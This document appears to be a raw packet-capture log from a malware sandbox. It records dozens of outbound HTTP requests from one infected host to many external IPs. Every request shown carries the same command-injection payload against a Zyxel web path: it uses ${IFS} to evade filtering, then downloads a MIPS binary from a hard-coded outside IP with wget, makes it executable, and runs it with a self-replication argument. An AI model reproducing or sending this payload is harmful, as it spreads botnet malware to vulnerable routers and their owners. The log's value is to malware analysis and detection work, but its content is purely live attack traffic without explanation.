                                    Jan 13, 2024 19:02:39.293092966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5621192.168.2.1343004129.140.157.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293140888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5622192.168.2.1346792167.209.67.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293215036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5623192.168.2.1345648210.10.189.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293215036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5624192.168.2.1342472111.154.209.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293299913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5625192.168.2.133340643.119.34.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293335915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5626192.168.2.133967064.223.92.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293395042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5627192.168.2.1354516204.152.63.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293458939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5628192.168.2.1351808208.12.16.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293467999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5629192.168.2.135423224.71.162.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293523073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5630192.168.2.133811080.127.26.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293584108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5631192.168.2.135025449.181.172.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293661118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5632192.168.2.134261617.81.1.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293739080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5633192.168.2.1345994109.20.26.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293765068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5634192.168.2.1351148170.115.52.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293808937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5635192.168.2.135962848.27.254.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293864965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5636192.168.2.13480161.68.252.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293869019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5637192.168.2.134961699.67.156.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293903112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5638192.168.2.133645032.234.118.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294068098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5639192.168.2.1336694190.4.234.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294070005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5640192.168.2.1348110115.159.187.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294085979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5641192.168.2.1340306176.228.189.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294097900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5642192.168.2.134734295.230.12.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294121981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5643192.168.2.1344636102.102.2.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294154882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5644192.168.2.134444895.59.14.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294209957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5645192.168.2.1348230125.219.168.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294281960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5646192.168.2.1346504187.23.104.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294302940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5647192.168.2.1355256120.86.200.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294361115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5648192.168.2.1360398113.110.126.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294409990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5649192.168.2.1349932218.73.172.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294466019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5650192.168.2.1352956143.63.14.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294503927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5651192.168.2.1353160222.242.214.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294543028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5652192.168.2.1336432126.145.99.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294641018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5653192.168.2.135399613.219.229.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294641018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5654192.168.2.1348984119.97.38.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294702053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5655192.168.2.1356426212.106.210.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294764042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5656192.168.2.1345438213.29.85.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294823885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5657192.168.2.134488090.2.203.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294884920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5658192.168.2.1335830149.225.200.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294950008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5659192.168.2.134366223.60.234.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.294975996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5660192.168.2.134836676.34.91.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295039892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5661192.168.2.134913277.84.72.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295103073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5662192.168.2.134849285.73.108.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295140982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5663192.168.2.1345890150.115.6.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295178890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5664192.168.2.1337668195.248.119.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295248985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5665192.168.2.1339980142.41.14.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295286894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5666192.168.2.1350596153.177.237.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295341015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5667192.168.2.133500248.157.248.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295404911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5668192.168.2.133617483.19.222.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295465946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5669192.168.2.133893669.30.230.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295500994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5670192.168.2.1353190102.155.204.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295567036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5671192.168.2.135620436.11.198.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295622110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5672192.168.2.1354086115.41.101.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295680046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5673192.168.2.1335172204.200.78.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295746088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5674192.168.2.134652071.53.210.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295778990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5675192.168.2.1357778129.191.9.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295830011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5676192.168.2.1341562103.83.223.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295900106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5677192.168.2.1345860179.137.231.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295945883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5678192.168.2.1340464164.243.41.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.295983076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5679192.168.2.1343960202.149.154.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296046019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5680192.168.2.1355156189.59.164.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296076059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5681192.168.2.1334360100.7.63.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296132088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5682192.168.2.134154018.73.30.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.296206951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5683192.168.2.1339852108.72.36.31443
                                    TimestampBytes transferredDirectionData
